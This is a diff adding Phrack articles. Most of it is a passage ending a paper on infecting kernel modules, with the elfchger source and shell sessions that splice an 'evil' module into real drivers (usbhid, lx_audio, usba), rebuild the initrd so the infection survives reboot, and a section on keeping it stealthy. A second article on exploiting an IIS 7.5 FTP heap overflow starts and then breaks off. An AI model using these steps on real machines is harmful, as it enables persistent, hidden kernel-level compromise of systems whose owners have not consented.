+    printk(KERN_ALERT "Init Inject! Usbhid");
+
+    /* does something */
+
+    return 0;
+}
+/****************** EOF **************************************************/
+
+$ ./elfchger -g hid_init usbhid.ko
+[+] Opening usbhid.ko file...
+[+] Reading Elf header...
+	>> Done!
+[+] Finding ".symtab" section...
+	>> Found at 0xa24c
+[+] Finding ".strtab" section...
+	>> Found at 0xa274
+[+] Getting symbol' infos:
+	>> Symbol found at 0xa4dc
+	>> Index in symbol table: 0x24
+[+] Reordering symbols:
+	>> Starting:
+	>> Moving symbol from 25 to 24
+...
+	>> Moving symbol from a6 to a5
+	>> Moving our symbol from 36 to a6
+	>> Last LOCAL symbol: 0xa6
+	>> Done!
+[+] Updating symbol' infos:
+	>> Symbol found at 0xacfc
+	>> Index in symbol table: 0xa6
+	>> Replacing flag 'LOCAL' located at 0xad08 with 'GLOBAL'
+[+] Updating symtab infos at 0xa24c
+
+$ ld -r usbhid.ko evil.ko -o new.ko
+$ objdump -t new.ko | grep -e init_module -e evil
+00000000 l    df *ABS*	00000000 evil.c
+00000000 l    df *ABS*	00000000 evil.mod.c
+000000dc g     F .init.text	0000001b evil
+00000000 g     F .init.text	000000c3 init_module
+
+
+$ ./elf -s init_module -v 000000dc new.ko
+[+] Opening new.ko file...
+[+] Reading Elf header...
+	>> Done!
+[+] Finding ".symtab" section...
+	>> Found at 0xa424
+[+] Finding ".strtab" section...
+	>> Found at 0xa44c
+[+] Getting symbol' infos:
+	>> Symbol found at 0xd2dc
+	>> Index in symbol table: 0xd5
+[+] Replacing 0x00000000 with 0x000000dc... done!
+
+$ mv new.ko usbhid.ko
+
+Once the target module has been infected with the evil one, we must
+recreate the initrd image:
+
+$ cd /tmp/initrd/
+$ find . | cpio -o -H newc | gzip > /tmp/initrd.img-2.6.35-22-generic
+50522 blocks
+$ cp ../initrd.img-2.6.35-22-generic /boot/
+
+From now on, every time the system is booted, the infected usbhid kernel
+module will be loaded instead of the original one.
+
+
+---[ 6 - What about other systems?
+
+
+In this last chapter we will see how the presented infection method can
+applied to other operating systems, specifically Solaris, FreeBSD, NetBSD
+and OpenBSD. It will be shown that, even if the method is different from
+that used on Linux, infection is still possible.
+
+
+---[ 6.1 - Solaris
+
+On Solaris systems infecting a kernel module is simpler than on Linux ones.
+Changing the symbol's name in the .strtab ELF section is sufficient,
+similarly to truff's original method for the Linux kernel 2.4.* versions.
+The method has been tested on Solaris 10:
+
+# uname -a
+SunOS unknown 5.10 Generic_142910-17 i86pc i386 i86pc
+
+
+---[ 6.1.1 - A basic example
+
+
+The orig.c and evil.c source codes are as follows:
+
+/******************************** orig.c *********************************/
+#include <sys/ddi.h>
+#include <sys/sunddi.h>
+#include <sys/modctl.h>
+
+extern struct mod_ops mod_miscops;
+
+static struct modlmisc modlmisc =
+{
+    &mod_miscops,
+    "original",
+};
+
+static struct modlinkage modlinkage =
+{
+    MODREV_1,
+    (void *) &modlmisc,
+    NULL
+};
+
+int _init(void) {
+
+    int i;
+
+    if ((i = mod_install(&modlinkage)) != 0)
+        cmn_err(CE_NOTE, "Can't load module!\n");
+    else
+        cmn_err(CE_NOTE, "Init Original!");
+
+    return i;
+}
+
+int _info(struct modinfo *modinfop) {
+
+    return (mod_info(&modlinkage, modinfop));
+}
+
+int _fini(void) {
+
+    int i;
+
+    if ((i = mod_remove(&modlinkage)) != 0)
+        cmn_err(CE_NOTE, "Can't remove module!\n");
+    else
+        cmn_err(CE_NOTE, "Exit Original!");
+
+    return i;
+}
+/******************************** EOF ************************************/
+
+/******************************** evil.c *********************************/
+#include <sys/ddi.h>
+#include <sys/sunddi.h>
+
+#include <sys/modctl.h>
+
+extern int _evil(void);
+
+int _init(void) {
+
+    cmn_err(CE_NOTE, "Inject!");
+
+    _evil();
+
+    return 0;
+}
+/******************************** EOF ************************************/
+
+The _init function is called at module initialisation, while the _fini one
+is called at module cleanup. The _info function prints information about
+the module when the "modinfo" command is invoked. The two modules can be
+compiled using the following commands:
+
+# /usr/sfw/bin/gcc -g -D_KERNEL -DSVR4 -DSOL2 -DDEBUG -O2 -c orig.c
+# /usr/sfw/bin/gcc -g -D_KERNEL -DSVR4 -DSOL2 -DDEBUG -O2 -c evil.c
+
+Let's have a look at the orig.o ELF file by using the "elfdump" command:
+
+# /usr/ccs/bin/elfdump -s orig.o
+
+Symbol Table Section:  .symtab
+    index    value      size      type bind oth ver shndx     name
+      [0]  0x00000000 0x00000000  NOTY LOCL  D    0 UNDEF
+      [1]  0x00000000 0x00000000  FILE LOCL  D    0 ABS       orig.c
+      [2]  0x00000000 0x00000000  SECT LOCL  D    0 .text
+
+      ...
+
+     [16]  0x00000000 0x00000000  NOTY GLOB  D    0 UNDEF     mod_miscops
+     [17]  0x00000000 0x0000004d  FUNC GLOB  D    0 .text     _init
+     [18]  0x00000000 0x00000000  NOTY GLOB  D    0 UNDEF     mod_install
+     [19]  0x00000000 0x00000000  NOTY GLOB  D    0 UNDEF     cmn_err
+     [20]  0x00000050 0x00000018  FUNC GLOB  D    0 .text      _info
+     [21]  0x00000000 0x00000000  NOTY GLOB  D    0 UNDEF     mod_info
+     [22]  0x00000068 0x0000004d  FUNC GLOB  D    0 .text     _fini
+     [23]  0x00000000 0x00000000  NOTY GLOB  D    0 UNDEF     mod_remove
+
+The _evil() function must be called instead of _init when the module is
+loaded. To achieve this, the following steps have to be performed:
+
+- Change the _init symbol name to _evil in orig.o;
+- Link the two modules together;
+
+This way, the kernel will load the _init() function defined in evil.c which
+in turn will call the _evil() function (the old _init()) in order to
+maintain the correct behaviour of the orig module. It is possible to change
+a symbol name using the 'objcopy' tool. In fact the '--redefine-sym' option
+can be used to give an arbitrary name to the specified symbol:
+
+# /usr/sfw/bin/gobjcopy --redefine-sym _init=_evil orig.o
+# /usr/ccs/bin/elfdump -s orig.o
+
+Symbol Table Section:  .symtab
+     index    value      size      type bind oth ver shndx      name
+       [0]  0x00000000 0x00000000  NOTY LOCL  D    0 UNDEF
+       [1]  0x00000000 0x00000000  FILE LOCL  D    0 ABS        orig.c
+       [2]  0x00000000 0x00000000  SECT LOCL  D    0 .text
+
+       ...
+
+      [16]  0x00000000 0x00000000  NOTY GLOB  D    0 UNDEF      mod_miscops
+      [17]  0x00000000 0x0000004d  FUNC GLOB  D    0 .text      _evil
+      [18]  0x00000000 0x00000000  NOTY GLOB  D    0 UNDEF      mod_install
+      [19]  0x00000000 0x00000000  NOTY GLOB  D    0 UNDEF      cmn_err
+      [20]  0x00000050 0x00000018  FUNC GLOB  D    0 .text      _info
+      [21]  0x00000000 0x00000000  NOTY GLOB  D    0 UNDEF      mod_info
+      [22]  0x00000068 0x0000004d  FUNC GLOB  D    0 .text      _fini
+      [23]  0x00000000 0x00000000  NOTY GLOB  D    0 UNDEF      mod_remove
+
+
+By checking with "elfdump" it is possible to verify if the script properly
+performed its job:
+
+# /usr/ccs/bin/elfdump -s orig.o
+
+Symbol Table Section:  .symtab
+     index    value      size      type bind oth ver shndx     name
+       [0]  0x00000000 0x00000000  NOTY LOCL  D    0 UNDEF
+       [1]  0x00000000 0x00000000  FILE LOCL  D    0 ABS       orig.c
+       [2]  0x00000000 0x00000000  SECT LOCL  D    0 .text
+
+       ...
+
+      [16]  0x00000000 0x00000000  NOTY GLOB  D    0 UNDEF     mod_miscops
+      [17]  0x00000000 0x0000004d  FUNC GLOB  D    0 .text     _evil
+      [18]  0x00000000 0x00000000  NOTY GLOB  D    0 UNDEF     mod_install
+      [19]  0x00000000 0x00000000  NOTY GLOB  D    0 UNDEF     cmn_err
+      [20]  0x00000050 0x00000018  FUNC GLOB  D    0 .text     _info
+      [21]  0x00000000 0x00000000  NOTY GLOB  D    0 UNDEF     mod_info
+      [22]  0x00000068 0x0000004d  FUNC GLOB  D    0 .text     _fini
+      [23]  0x00000000 0x00000000  NOTY GLOB  D    0 UNDEF     mod_remove
+
+The _init symbol name has been modified to _evil. The modules are then
+linked together using the "ld" command:
+
+# ld -r orig.o evil.o -o new.o
+
+The new.o elf file dump follows:
+
+# /usr/ccs/bin/elfdump -s new.o
+
+Symbol Table Section:  .symtab
+     index    value      size      type bind oth ver shndx     name
+       [0]  0x00000000 0x00000000  NOTY LOCL  D    0 UNDEF
+       [1]  0x00000000 0x00000000  FILE LOCL  D    0 ABS       new.o
+       [2]  0x00000000 0x00000000  SECT LOCL  D    0 .text
+
+       ...
+
+      [27]  0x00000000 0x00000000  FILE LOCL  D    0 ABS       evil.c
+      [28]  0x00000000 0x00000000  NOTY GLOB  D    0 UNDEF     mod_install
+      [29]  0x00000000 0x0000004d  FUNC GLOB  D    0 .text     _evil
+      [30]  0x00000068 0x0000004d  FUNC GLOB  D    0 .text     _fini
+      [31]  0x00000050 0x00000018  FUNC GLOB  D    0 .text     _info
+      [32]  0x000000b8 0x0000001e  FUNC GLOB  D    0 .text     _init
+      [33]  0x00000000 0x00000000  NOTY GLOB  D    0 UNDEF     mod_miscops
+      [34]  0x00000000 0x00000000  NOTY GLOB  D    0 UNDEF     mod_info
+      [35]  0x00000000 0x00000000  NOTY GLOB  D    0 UNDEF     mod_remove
+      [36]  0x00000000 0x00000000  NOTY GLOB  D    0 UNDEF     cmn_err
+
+To summarize, the _init symbol is referring to the function defined in
+evil.c, while the _evil symbol is referring to the old _init defined in
+orig.c that we have just renamed to _evil.
+
+Now, the last step is to rename the new.o into orig.o and to load it:
+
+# mv new.o orig.o
+# modload orig.o
+# tail /var/adm/messages
+...
+May ... orig.o: [ID 343233 kern.notice] NOTICE: Inject!
+May ... orig.o: [ID 662037 kern.notice] NOTICE: Init Original!
+
+As you can see the module is successfully infected.
+
+# modinfo | grep orig.o
+247 fa9e6eac    160   -   1  orig.o (original)
+
+# modunload -i 247
+
+
+---[ 6.1.2 - Playing with OS modules
+
+
+This section will explain how to infect a system kernel module. The method
+remains the same but it will be necessary to make minor changes to the evil
+module in order to correctly load it to memory. The evil module will be
+injected into the audio driver.  First of all, the module has to be
+unloaded:
+
+# modinfo | grep lx_audio
+216 f99e40e0   2614 242   1  lx_audio (linux audio driver 'lx_audio' 1)
+# modunload -i 216
+
+Now, it is possible to play with it:
+
+# /usr/ccs/bin/elfdump -s lx_audio|grep _init
+    [64]  0x000020c2 0x00000011  FUNC GLOB  D    0 .text       _init
+   [118]  0x00000000 0x00000000  FUNC GLOB  D    0 UNDEF       mutex_init
+
+# /usr/sfw/bin/gobjcopy --redefine-sym _init=_evil lx_audio
+# ld -r evil.o lx_audio -o new
+# /usr/ccs/bin/elfdump -s new|grep _evil
+      [77]  0x000020de 0x00000011  FUNC GLOB  D    0 .text          _evil
+
+# mv new lx_audio
+# modload lx_audio
+
+# tail /var/adm/messages
+...
+
+Dec 29 17:00:19 spaccio lx_audio: ... NOTICE: Inject!
+
+Great, it works!
+
+
+---[ 6.1.3 - Keeping it stealthy
+
+
+According to the /etc/system file, the kernel modules that are loaded at
+boot time are located in the /kernel and /usr/kernel directories. The
+platform-dependent modules reside in the /platform directory. In this
+example I'll infect the usb kernel module: usba.
+
+First of all the kernel module's position in the filesystem must be
+located:
+
+# find /kernel -name usba
+/kernel/misc/amd64/usba
+/kernel/misc/usba
+/kernel/kmdb/amd64/usba
+/kernel/kmdb/usba
+
+# cd /kernel/misc/usba
+
+# /usr/ccs/bin/elfdump -s usba|grep _init
+     ...
+
+     [291]  0x00017354 0x0000004c  FUNC LOCL  D    0 .text     ugen_ds_init
+     [307]  0x00017937 0x000000e3  FUNC LOCL  D    0 .text     ugen_pm_init
+     [347]  0x00000fd4 0x00000074  FUNC GLOB  D    0 .text     _init
+     ....
+     [655]  0x00000000 0x00000000  FUNC GLOB  D    0 UNDEF     rw_init
+     [692]  0x00000000 0x00000000  FUNC GLOB  D    0 UNDEF     cv_init
+
+Now it is possible to change the _init symbol name to _evil.
+
+# /usr/sfw/bin/gobjcopy --redefine-sym _init=_evil usba
+# /usr/ccs/bin/elfdump -s usba|grep _evil
+     [348]  0x00000fd4 0x00000074  FUNC GLOB  D    0 .text     _evil
+
+# ld -r evil.o usba -o new
+
+Now we have only to rename the module to its original name:
+
+# mv new usba
+
+From now on, every time the system is booted, the infected usba kernel
+module will be loaded instead of the original one.
+
+
+---[ 6.2 - *BSD
+
+
+---[ 6.2.1 - FreeBSD - NetBSD - OpenBSD
+
+
+The conclusions made by truff are still valid in the newest versions of
+these operating systems. On FreeBSD, kernel modules are shared objects, so
+the proposed method doesn't work because the kernel modules can't be
+partially linked. On NetBSD and OpenBSD what we have to do is simply to
+change the entry point of the kernel module when it is loaded. So our
+function will be invoked instead the original one.
+
+
+---[ 7 - Conclusions
+
+
+In this paper a new module injection method was introduced to be used with
+Linux kernel 2.6.x/3.0.x series. Several methods, from simple to more
+sophisticated were presented to inject external code into kernel modules.
+
+It was also explained how the method (with some changes) can be
+successfully applied to a wide range of operating systems. I hope you'll
+have fun with it and that you enjoyed this paper!
+
+Bye.
+
+
+---[ 8 - References
+
+
+[1] Infecting loadable kernel modules
+    http://www.phrack.com/issues.html?issue=61&id=10#article
+
+[2] EXECUTABLE AND LINKABLE FORMAT (ELF)
+    http://www.muppetlabs.com/~breadbox/software/ELF.txt
+
+[3] Init Call Mechanism in the Linux Kernel
+    http://linuxgazette.net/157/amurray.html
+
+[4] Understanding the Linux Kernel, 3rd Edition
+
+[5] Init Call Mechanism in the Linux Kernel
+    http://linuxgazette.net/157/amurray.html
+
+[6] OpenBSD Loadable Kernel Modules
+    http://www.thc.org/root/docs/loadable_kernel_modules/openbsd-lkm.html
+
+[7] Introduction to NetBSD loadable kernel modules
+    http://www.home.unix-ag.org/bmeurer/NetBSD/howto-lkm.html
+
+[8] Solaris Loadable Kernel Modules
+    http://www.thc.org/papers/slkm-1.0.html
+
+[9] Initrd, modules, and tools
+    http://www.dark.ca/2009/06/10/initrd-modules-and-tools/
+
+
+---[ 9 - Codes
+
+
+---[ 9.1 - Elfchger
+
+
+/*
+ * elfchger.c by styx^ <the.styx@gmail.com> (based on truff's code)
+ *
+ * Script with two features:
+ *
+ * Usage 1: Change the symbol name value (address) in a kernel module.
+ * Usage 2: Change the symbol binding (from local to global) in a kernel
+ *          module.
+ *
+ * Usage:
+ * 1: ./elfchger -f [symbol] -v [value] <module_name>
+ * 2: ./elfchger -g [symbol] <module_name>
+ */
+
+#include <stdlib.h>
+#include <stdio.h>
+#include <elf.h>
+#include <string.h>
+#include <getopt.h>
+
+int ElfGetSectionByName (FILE *fd, Elf32_Ehdr *ehdr, char *section,
+                         Elf32_Shdr *shdr);
+
+int ElfGetSectionName (FILE *fd, Elf32_Word sh_name,
+                       Elf32_Shdr *shstrtable, char *res, size_t len);
+
+Elf32_Off ElfGetSymbolByName (FILE *fd, Elf32_Shdr *symtab,
+                       Elf32_Shdr *strtab, char *name, Elf32_Sym *sym);
+
+void ElfGetSymbolName (FILE *fd, Elf32_Word sym_name,
+                       Elf32_Shdr *strtable, char *res, size_t len);
+
+unsigned long ReorderSymbols (FILE *fd, Elf32_Shdr *symtab,
+                       Elf32_Shdr *strtab, char *name);
+
+int ReoderRelocation(FILE *fd, Elf32_Shdr *symtab,
+                       Elf32_Shdr *strtab, char *name, Elf32_Sym *sym);
+
+int ElfGetSectionByIndex (FILE *fd, Elf32_Ehdr *ehdr, Elf32_Half index,
+                          Elf32_Shdr *shdr);
+
+void usage(char *cmd);
+
+int main (int argc, char **argv) {
+
+  FILE *fd;
+  Elf32_Ehdr hdr;
+  Elf32_Shdr symtab, strtab;
+  Elf32_Sym sym;
+  Elf32_Off symoffset;
+  Elf32_Addr value;
+
+  unsigned long new_index = 0;
+  int gflag = 0, vflag = 0, fflag = 0;
+  char *sym_name;
+  int sym_value = 0;
+
+  long sym_off, str_off;
+  int opt;
+
+  if ( argc != 4 && argc != 6 ) {
+    usage(argv[0]);
+    exit(-1);
+  }
+
+  while ((opt = getopt(argc, argv, "vsg")) != -1) {
+
+    switch (opt) {
+
+      case 'g':
+
+        if( argc-1 < optind) {
+	    printf("[-] You must specify symbol name!\n");
+	    usage(argv[0]);
+	    exit(-1);
+        }
+
+        gflag = 1;
+        sym_name = argv[optind];
+
+        break;
+
+      case 's':
+
+        if( argc-1 < optind) {
+          printf("[-] You must specify symbol name!\n");
+          usage(argv[0]);
+          exit(-1);
+        }
+
+        fflag = 1;
+        sym_name = argv[optind];
+
+        break;
+
+      case 'v':
+
+        if( argc-1 < optind) {
+          printf("[-] You must specify new symbol address\n");
+          usage(argv[0]);
+          exit(-1);
+        }
+
+        vflag = 1;
+        sym_value = strtol(argv[optind], (char **) NULL, 16);
+
+        break;
+
+      default:
+        usage(argv[0]);
+        exit(-1);
+    }
+  }
+
+  printf("[+] Opening %s file...\n", argv[argc-1]);
+
+  fd = fopen (argv[argc-1], "r+");
+
+  if (fd == NULL) {
+
+    printf("[-] File \"%s\" not found!\n", argv[1]);
+    exit(-1);
+  }
+
+  printf("[+] Reading Elf header...\n");
+
+  if (fread (&hdr, sizeof (Elf32_Ehdr), 1, fd) < 1) {
+
+    printf("[-] Elf header corrupted!\n");
+    exit(-1);
+  }
+
+  printf("\t>> Done!\n");
+
+  printf("[+] Finding \".symtab\" section...\n");
+
+  sym_off = ElfGetSectionByName (fd, &hdr, ".symtab", &symtab);
+
+  if (sym_off == -1) {
+
+    printf("[-] Can't get .symtab section\n");
+    exit(-1);
+  }
+
+  printf("\t>> Found at 0x%x\n", (int )sym_off);
+  printf("[+] Finding \".strtab\" section...\n");
+
+  str_off = ElfGetSectionByName (fd, &hdr, ".strtab", &strtab);
+
+  if (str_off  == -1) {
+
+    printf("[-] Can't get .strtab section!\n");
+    exit(-1);
+  }
+
+  printf("\t>> Found at 0x%x\n", (int )str_off);
+
+  printf("[+] Getting symbol' infos:\n");
+
+  symoffset = ElfGetSymbolByName (fd, &symtab, &strtab, sym_name, &sym);
+
+  if ( (int) symoffset == -1) {
+
+    printf("[-] Symbol \"%s\" not found!\n", sym_name);
+    exit(-1);
+  }
+
+  if ( gflag == 1 ) {
+
+    if ( ELF32_ST_BIND(sym.st_info) == STB_LOCAL ) {
+
+      unsigned char global;
+      unsigned long offset = 0;
+
+      printf("[+] Reordering symbols:\n");
+
+      new_index = ReorderSymbols(fd, &symtab, &strtab, sym_name);
+
+      printf("[+] Updating symbol' infos:\n");
+
+      symoffset = ElfGetSymbolByName(fd, &symtab, &strtab, sym_name, &sym);
+
+      if ( (int) symoffset == -1) {
+
+        printf("[-] Symbol \"%s\" not found!\n", sym_name);
+        exit(-1);
+      }
+
+      offset = symoffset+1+sizeof(Elf32_Addr)+1+sizeof(Elf32_Word)+2;
+
+      printf("\t>> Replacing flag 'LOCAL' located at 0x%x with 'GLOBAL'\
+              \n", (unsigned int)offset);
+
+      if (fseek (fd, offset, SEEK_SET) == -1) {
+
+        perror("[-] fseek: ");
+        exit(-1);
+      }
+
+      global = ELF32_ST_INFO(STB_GLOBAL, STT_FUNC);
+
+      if (fwrite (&global, sizeof(unsigned char), 1, fd) < 1) {
+
+        perror("[-] fwrite: ");
+        exit(-1);
+      }
+
+      printf("[+] Updating symtab infos at 0x%x\n", (int )sym_off);
+
+      if ( fseek(fd, sym_off, SEEK_SET) == -1 ) {
+
+        perror("[-] fseek: ");
+        exit(-1);
+      }
+
+      symtab.sh_info = new_index; // updating sh_info with the new index
+                                  // in symbol table.
+
+      if( fwrite(&symtab, sizeof(Elf32_Shdr), 1, fd) < 1 )  {
+
+        perror("[-] fwrite: ");
+        exit(-1);
+      }
+
+    } else {
+
+      printf("[-] Already global function!\n");
+    }
+
+  } else if ( fflag == 1 && vflag == 1 ) {
+
+      memset(&value, 0, sizeof(Elf32_Addr));
+      memcpy(&value, &sym_value, sizeof(Elf32_Addr));
+
+      printf("[+] Replacing 0x%.8x with 0x%.8x... ", sym.st_value, value);
+
+      if (fseek (fd, symoffset+sizeof(Elf32_Word), SEEK_SET) == -1) {
+
+        perror("[-] fseek: ");
+        exit(-1);
+      }
+
+      if (fwrite (&value, sizeof(Elf32_Addr), 1, fd) < 1 )  {
+
+        perror("[-] fwrite: ");
+        exit(-1);
+      }
+
+      printf("done!\n");
+
+      fclose (fd);
+}
+
+return 0;
+}
+
+/* This function returns the offset relative to the symbol name "name" */
+
+Elf32_Off ElfGetSymbolByName(FILE *fd, Elf32_Shdr *symtab,
+        Elf32_Shdr *strtab, char *name, Elf32_Sym *sym) {
+
+  unsigned int i;
+  char symname[255];
+
+  for ( i = 0; i < (symtab->sh_size/symtab->sh_entsize); i++) {
+
+    if (fseek (fd, symtab->sh_offset + (i * symtab->sh_entsize),
+               SEEK_SET) == -1) {
+
+      perror("\t[-] fseek: ");
+      exit(-1);
+    }
+
+    if (fread (sym, sizeof (Elf32_Sym), 1, fd) < 1) {
+
+      perror("\t[-] read: ");
+      exit(-1);
+    }
+
+    memset (symname, 0, sizeof (symname));
+
+    ElfGetSymbolName (fd, sym->st_name, strtab, symname, sizeof (symname));
+
+    if (!strcmp (symname, name)) {
+
+      printf("\t>> Symbol found at 0x%x\n",
+                    symtab->sh_offset + (i * symtab->sh_entsize));
+
+      printf("\t>> Index in symbol table: 0x%x\n", i);
+
+      return symtab->sh_offset + (i * symtab->sh_entsize);
+    }
+  }
+
+  return -1;
+}
+
+/* This function returns the new index of symbol "name" inside the symbol
+ * table after re-ordering. */
+
+unsigned long ReorderSymbols (FILE *fd, Elf32_Shdr *symtab,
+              Elf32_Shdr *strtab, char *name) {
+
+  unsigned int i = 0, j = 0;
+  char symname[255];
+  Elf32_Sym *all;
+  Elf32_Sym temp;
+  unsigned long new_index = 0;
+  unsigned long my_off = 0;
+
+  printf("\t>> Starting:\n");
+
+  all = (Elf32_Sym *) malloc(sizeof(Elf32_Sym) *
+                      (symtab->sh_size/symtab->sh_entsize));
+
+  if ( all == NULL ) {
+
+    return -1;
+
+  }
+
+  memset(all, 0, symtab->sh_size/symtab->sh_entsize);
+
+  my_off = symtab->sh_offset;
+
+  for ( i = 0; i < (symtab->sh_size/symtab->sh_entsize); i++) {
+
+    if (fseek (fd, symtab->sh_offset + (i * symtab->sh_entsize),
+							 SEEK_SET) == -1) {
+
+      perror("\t[-] fseek: ");
+      exit(-1);
+    }
+
+    if (fread (&all[i], sizeof (Elf32_Sym), 1, fd) < 1) {
+
+      printf("\t[-] fread: ");
+      exit(-1);
+    }
+
+    memset (symname, 0, sizeof (symname));
+
+    ElfGetSymbolName(fd, all[i].st_name, strtab, symname, sizeof(symname));
+
+    if (!strcmp (symname, name)) {
+
+      j = i;
+
+      continue;
+    }
+  }
+
+  temp = all[j];
+
+  for ( i = j; i < (symtab->sh_size/symtab->sh_entsize); i++ ) {
+
+    if ( i+1 >= symtab->sh_size/symtab->sh_entsize )
+      break;
+
+    if ( ELF32_ST_BIND(all[i+1].st_info) == STB_LOCAL ) {
+
+      printf("\t>> Moving symbol from %x to %x\n", i+1, i);
+
+      all[i] = all[i+1];
+
+    } else {
+
+      new_index = i;
+
+      printf("\t>> Moving our symbol from %d to %x\n", j, i);
+
+      all[i] = temp;
+      break;
+    }
+  }
+
+  printf("\t>> Last LOCAL symbol: 0x%x\n", (unsigned int)new_index);
+
+  if ( fseek (fd, my_off, SEEK_SET) == -1 ) {
+
+      perror("\t[-] fseek: ");
+      exit(-1);
+  }
+
+  if ( fwrite(all, sizeof( Elf32_Sym), symtab->sh_size/symtab->sh_entsize,
+              fd) < (symtab->sh_size/symtab->sh_entsize )) {
+
+      perror("\t[-] fwrite: ");
+      exit(-1);
+  }
+
+  printf("\t>> Done!\n");
+
+  free(all);
+
+  return new_index;
+}
+
+
+int ElfGetSectionByIndex (FILE *fd, Elf32_Ehdr *ehdr, Elf32_Half index,
+                          Elf32_Shdr *shdr) {
+
+  if (fseek (fd, ehdr->e_shoff + (index * ehdr->e_shentsize),
+             SEEK_SET) == -1) {
+
+    perror("\t[-] fseek: ");
+    exit(-1);
+  }
+
+  if (fread (shdr, sizeof (Elf32_Shdr), 1, fd) < 1) {
+
+    printf("\t[-] Sections header corrupted");
+    exit(-1);
+  }
+
+  return 0;
+}
+
+
+int ElfGetSectionByName (FILE *fd, Elf32_Ehdr *ehdr, char *section,
+                         Elf32_Shdr *shdr) {
+
+  int i;
+  char name[255];
+  Elf32_Shdr shstrtable;
+
+  ElfGetSectionByIndex (fd, ehdr, ehdr->e_shstrndx, &shstrtable);
+
+  memset (name, 0, sizeof (name));
+
+  for ( i = 0; i < ehdr->e_shnum; i++) {
+
+    if (fseek (fd, ehdr->e_shoff + (i * ehdr->e_shentsize),
+               SEEK_SET) == -1) {
+
+      perror("\t[-] fseek: ");
+      exit(-1);
+    }
+
+    if (fread (shdr, sizeof (Elf32_Shdr), 1, fd) < 1) {
+
+      printf("[-] Sections header corrupted");
+      exit(-1);
+    }
+
+    ElfGetSectionName (fd, shdr->sh_name, &shstrtable,
+                       name, sizeof (name));
+
+    if (!strcmp (name, section)) {
+
+      return ehdr->e_shoff + (i * ehdr->e_shentsize);
+
+    }
+  }
+
+  return -1;
+}
+
+int ElfGetSectionName (FILE *fd, Elf32_Word sh_name,
+                       Elf32_Shdr *shstrtable, char *res, size_t len) {
+
+  size_t i = 0;
+
+  if (fseek (fd, shstrtable->sh_offset + sh_name, SEEK_SET) == -1) {
+
+    perror("\t[-] fseek: ");
+    exit(-1);
+  }
+
+  while ( (i < len-1) || *res != '\0' ) {
+
+    *res = fgetc (fd);
+    i++;
+    res++;
+
+  }
+
+  return 0;
+}
+
+
+void ElfGetSymbolName (FILE *fd, Elf32_Word sym_name,
+                       Elf32_Shdr *strtable, char *res, size_t len)
+{
+  size_t i = 0;
+
+  if (fseek (fd, strtable->sh_offset + sym_name, SEEK_SET) == -1) {
+
+    perror("\t[-] fseek: ");
+    exit(-1);
+  }
+
+  while ((i < len-1) || *res != '\0') {
+
+    *res = fgetc (fd);
+    i++;
+    res++;
+
+  }
+
+  return;
+}
+
+void usage(char *cmd) {
+
+  printf("Usage: %s <option(s)> <module_name>\n", cmd);
+  printf("Option(s):\n");
+  printf(" -g [symbol]\tSymbol we want to change the binding as global\n");
+  printf("Or:\n");
+  printf(" -s [symbol]\tSymbol we want to change the value (address)\n");
+  printf(" -v [value] \tNew value (address) for symbol\n");
+
+  return;
+}
+
+
+---[ 9.2 - elfstrchange.patch
+
+
+@@ -9,6 +9,7 @@
+ #include <stdlib.h>
+ #include <stdio.h>
+ #include <elf.h>
++#include <string.h>
+
+ #define FATAL(X) { perror (X);exit (EXIT_FAILURE); }
+
+@@ -160,7 +161,7 @@
+   if (fseek (fd, shstrtable->sh_offset + sh_name, SEEK_SET) == -1)
+     FATAL ("fseek");
+
+-  while ((i < len) || *res == '\0')
++  while ((i < len-1) || *res != '\0')
+   {
+     *res = fgetc (fd);
+     i++;
+@@ -179,7 +180,7 @@
+   if (fseek (fd, strtable->sh_offset + sym_name, SEEK_SET) == -1)
+     FATAL ("fseek");
+
+-  while ((i < len) || *res == '\0')
++  while ((i < len-1) || *res != '\0')
+   {
+     *res = fgetc (fd);
+     i++;
+
+
+---[ EOF
diff --git a/phrack68/12.txt b/phrack68/12.txt
new file mode 100644
index 0000000..bfbed2c
--- /dev/null
+++ b/phrack68/12.txt
@@ -0,0 +1,1093 @@
+                              ==Phrack Inc.==
+
+                Volume 0x0e, Issue 0x44, Phile #0x0c of 0x13
+
+|=-----------------------------------------------------------------------=|
+|=-------------=[       The Art of Exploitation       ]=-----------------=|
+|=-----------------------------------------------------------------------=|
+|=-------------------=[   Exploiting MS11-004   ]=-----------------------=|
+|=----------=[ Microsoft IIS 7.5 remote heap buffer overflow ]=----------=|
+|=-----------------------------------------------------------------------=|
+|=------------------------=[  by redpantz  ]=----------------------------=|
+|=-----------------------------------------------------------------------=|
+
+--[ Table of Contents
+
+1  - Introduction
+2  - The Setup
+3  - The Vulnerability
+4  - Exploitation Primitives
+5  - Enabling the LFH
+6  - FreeEntryOffset Overwrite
+7  - The Impossible
+8  - Conclusion
+9  - References
+10 - Exploit (thing.py)
+
+
+--[ 1 - Introduction
+
+Exploitation of security vulnerabilities has greatly increased in
+difficulty since the days of the Slammer worm. There have been numerous
+exploitation mitigations implemented since the early 2000's. Many of these
+mitigations were focused on the Windows heap; such as Safe Unlinking and
+Heap Chunk header cookies in Windows XP Service Pack 2 and Safe Linking,
+expanded Encoded Chunk headers, Terminate on Corruption, and many others in
+Windows Vista/7 [1].
+
+The widely deployed implementation of anti-exploitation technologies has
+made gaining code execution from vulnerabilities much more expensive
+(notice that I say "expensive" and not "impossible"). By forcing the
+attacker to acquire more knowledge and spend expansive amounts of research
+time, the vendor has made exploiting these vulnerabilities increasingly
+difficult.
+
+This article will take you through the exploitation process (read: EIP) of
+a heap overflow vulnerability in Microsoft IIS 7.5 (MS11-004) on a 32-bit,
+single-core machine. While the target is a bit unrealistic for the
+real-world, and exploit reliability may be a bit suspect, it does suffice
+in showing that an "impossible to exploit" vulnerability can be leveraged
+for code execution with proper knowledge and sufficient time.
+
+Note: The structure of this article will reflect the steps, in order, taken
+when developing the exploit. It differs from the linear nature of the
+actual exploit because it is designed to show the thought process during
+exploit development. Also, since this article was authored quite some time
+after the initial exploitation process, some steps may have been left out
+(i.e. forgotten); quite sorry about that.
+
+
+--[ 2 - The Setup
+
+A proof of concept was released by Matthew Bergin in December 2010 that
+stated there existed an unauthenticated Denial of Service (DoS) against
+IIS FTP 7.5, which was triggered on Windows 7 Ultimate [3]. The exploit
+appeared to lack precision, so it was decided further investigation was
+necessary.
+
+After creating a test environment, the exploit was run with a debugger
+attached to the FTP process. Examination of the error concluded it wasn't
+a DoS and most likely could be used to achieve remote code execution:
+
+BUGCHECK_STR:
+APPLICATION_FAULT_ACTIONABLE_HEAP_CORRUPTION_\
+heap_failure_freelists_corruption
+
+PRIMARY_PROBLEM_CLASS:
